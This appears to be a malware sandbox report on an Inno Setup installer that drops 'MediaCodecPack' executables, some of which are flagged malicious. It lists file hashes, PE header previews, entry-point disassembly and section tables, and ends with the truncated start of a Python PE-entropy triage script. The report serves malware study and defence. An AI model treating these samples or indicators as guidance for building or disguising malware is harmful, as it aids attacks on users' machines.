                                                                                      Entropy (8bit):6.204917493416147
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):78183
                                                                                      Entropy (8bit):7.692742945771669
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
                                                                                      Entropy (8bit):6.204917493416147
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):3193465
                                                                                      Entropy (8bit):6.245419881846555
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
                                                                                      MD5:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                                      SHA1:BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
                                                                                      SHA-256:FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
                                                                                      SHA-512:73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499712
                                                                                      Entropy (8bit):6.414789978441117
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):348160
                                                                                      Entropy (8bit):6.542655141037356
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):717985
                                                                                      Entropy (8bit):6.51490177808013
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                      MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                      SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                      SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                      SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                      Malicious:true
                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:InnoSetup Log MediaCodecPack, version 0x30, 4691 bytes, 216865\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11"
                                                                                      Category:dropped
                                                                                      Size (bytes):4691
                                                                                      Entropy (8bit):4.725430655260978
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Le2bBdWO38DpTlII39V+eOIhj6a7ICSss/LnZTxE/5YJzjJ9JbxcPt:C2ddWO3opTliHIhjFICSsAnZTy/5YJzU
                                                                                      MD5:1055BF8E18FA55068A8B43B1345C46BB
                                                                                      SHA1:1CAE2E1F3D25AE2A9FE1A932BDA9E5D07EEAE87A
                                                                                      SHA-256:51C96E2174D2D8BF0150232D7D2955C095D488CE4E3AD3AA56814C7A78396972
                                                                                      SHA-512:E0824BC2C809A9C9688790DFF98589A40D2FC3BA63434F5CB051B03B27F216AC61B9B60955C86C8982728B8F16CAC68584D85DBF446330D15A8FD9643E88CED9
                                                                                      Malicious:false
                                                                                      Preview:Inno Setup Uninstall Log (b)....................................MediaCodecPack..................................................................................................................MediaCodecPack..................................................................................................................0.......S...%................................................................................................................{.T.........=f[......R....216865.user2C:\Users\user\AppData\Local\MediaCodecPack 1.0.11...........9...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):717985
                                                                                      Entropy (8bit):6.51490177808013
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                      MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                      SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                      SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                      SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                      Malicious:true
                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                       Process:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):706560
                                                                                      Entropy (8bit):6.506374420963084
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyF:FPcYn5c/rPx37/zHBA6pFptZ1CENqMRU
                                                                                      MD5:ED6A19AD054AD0172201AF725324781B
                                                                                      SHA1:817F409DBE431AE71D3AB4D70181257C3BEE4DBD
                                                                                      SHA-256:79DB034686A25A6BA5DEF19B0CDEDB7097A78F994FB4A1CD33765E0FD49C9423
                                                                                      SHA-512:D5D67F03F50D6EED159BB967735B9AE2ADDA579110D35A23A76BC2DF2B023122805C64E913A2A333B45EE8412F799BAC1538C8D4573DCDA7BB8147ACB6445729
                                                                                      Malicious:true
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                       Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2560
                                                                                      Entropy (8bit):2.8818118453929262
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                      MD5:A69559718AB506675E907FE49DEB71E9
                                                                                      SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                      SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                      SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):6144
                                                                                      Entropy (8bit):4.289297026665552
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                      MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                      SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                      SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                      SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23312
                                                                                      Entropy (8bit):4.596242908851566
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                      MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                      SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                      SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                      SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.997606116225022
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      File name:newwork.exe.1.exe
                                                                                      File size:3'314'669 bytes
                                                                                      MD5:27b4fa67c0810bc212077971a00854ea
                                                                                      SHA1:39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
                                                                                      SHA256:2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
                                                                                      SHA512:bdb5c6f3fa1ea7b99df763f02919e044882b581bb6ad308da52a7885bb308ca70eaa477dc84bbde627427acb013d8fadf5694c3168cfa580f7a0978574f13018
                                                                                      SSDEEP:98304:MfMeg4PkQUbNkhS0F6p1bfXNLDYtNmeJX2:g9PknkhSj1bf9LsmeF2
                                                                                      TLSH:FFE533FE7F84DD32F23604B95B2601BAC32B3D68196BA26837DD2C9E1F111A16971371
                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                      Icon Hash:2d2e3797b32b2b99
                                                                                      Entrypoint:0x40a5f8
                                                                                      Entrypoint Section:CODE
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:1
                                                                                      OS Version Minor:0
                                                                                      File Version Major:1
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:1
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      add esp, FFFFFFC4h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor eax, eax
                                                                                      mov dword ptr [ebp-10h], eax
                                                                                      mov dword ptr [ebp-24h], eax
                                                                                      call 00007F8110BA3043h
                                                                                      call 00007F8110BA424Ah
                                                                                      call 00007F8110BA44D9h
                                                                                      call 00007F8110BA457Ch
                                                                                      call 00007F8110BA651Bh
                                                                                      call 00007F8110BA8E86h
                                                                                      call 00007F8110BA8FEDh
                                                                                      xor eax, eax
                                                                                      push ebp
                                                                                      push 0040ACC9h
                                                                                      push dword ptr fs:[eax]
                                                                                      mov dword ptr fs:[eax], esp
                                                                                      xor edx, edx
                                                                                      push ebp
                                                                                      push 0040AC92h
                                                                                      push dword ptr fs:[edx]
                                                                                      mov dword ptr fs:[edx], esp
                                                                                      mov eax, dword ptr [0040C014h]
                                                                                      call 00007F8110BA9A9Bh
                                                                                      call 00007F8110BA9686h
                                                                                      cmp byte ptr [0040B234h], 00000000h
                                                                                      je 00007F8110BAA57Eh
                                                                                      call 00007F8110BA9B98h
                                                                                      xor eax, eax
                                                                                      call 00007F8110BA3D39h
                                                                                      lea edx, dword ptr [ebp-10h]
                                                                                      xor eax, eax
                                                                                      call 00007F8110BA6B2Bh
                                                                                      mov edx, dword ptr [ebp-10h]
                                                                                      mov eax, 0040CE28h
                                                                                      call 00007F8110BA30DAh
                                                                                      push 00000002h
                                                                                      push 00000000h
                                                                                      push 00000001h
                                                                                      mov ecx, dword ptr [0040CE28h]
                                                                                      mov dl, 01h
                                                                                      mov eax, 0040738Ch
                                                                                      call 00007F8110BA73BAh
                                                                                      mov dword ptr [0040CE2Ch], eax
                                                                                      xor edx, edx
                                                                                      push ebp
                                                                                      push 0040AC4Ah
                                                                                      push dword ptr fs:[edx]
                                                                                      mov dword ptr fs:[edx], esp
                                                                                      call 00007F8110BA9AF6h
                                                                                      mov dword ptr [0040CE34h], eax
                                                                                      mov eax, dword ptr [0040CE34h]
                                                                                      cmp dword ptr [eax+0Ch], 00000000h
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd000           0x950         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x11000          0x2c00        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xf000           0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
CODE    0x1000           0x9d30        0x9e00    c3bd95c4b1a8e5199981e0d9b45fd18c  False     0.6052709651898734   data       6.631765876950794   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA    0xb000           0x250         0x400     1ee71d84f1c77af85f1f5c278f880572  False     0.306640625          data       2.751820662285145   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS     0xc000           0xe8c         0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0xd000           0x950         0xa00     bb5485bf968b970e5ea81292af2acdba  False     0.414453125          data       4.430733069799036   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0xe000           0x8           0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0xf000           0x18          0x200     9ba824905bf9c7922b6fc87a38b74366  False     0.052734375          data       0.2044881574398449  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0x10000          0x8c4         0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x11000          0x2c00        0x2c00    0c0c7ee3853390cc0c21088a78f34d65  False     0.32555042613636365  data       4.491927698819795   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
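The section table reports an 8-bit Shannon entropy and the characteristics flags per section; the file as a whole sits at 7.9976, which is what a compressed installer payload looks like, while the sections of the outer stub stay low. The following is an added example, not code from the report or from Joe Sandbox, that decodes a raw IMAGE_SECTION_HEADER and recomputes the same entropy figure, then applies the two checks a triager runs over every row: a section that is both writable and executable, and raw bytes that are close to random. The .idata header bytes are constructed from the row above (its file offset is an assumption), the RWX header and the filler data are constructed counter-examples, and the 7.0 threshold is my choice, not a Joe Sandbox setting.

```python
"""Added example (not part of the Joe Sandbox report): parse raw PE section
headers and recompute the per-section 'Entropy (8bit)' plus two flag checks."""
import math
import struct
from collections import Counter
from dataclasses import dataclass

# IMAGE_SECTION_HEADER: 8-byte name, six DWORDs, two WORDs, one DWORD = 40 bytes.
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)

# Section characteristic bits (winnt.h).
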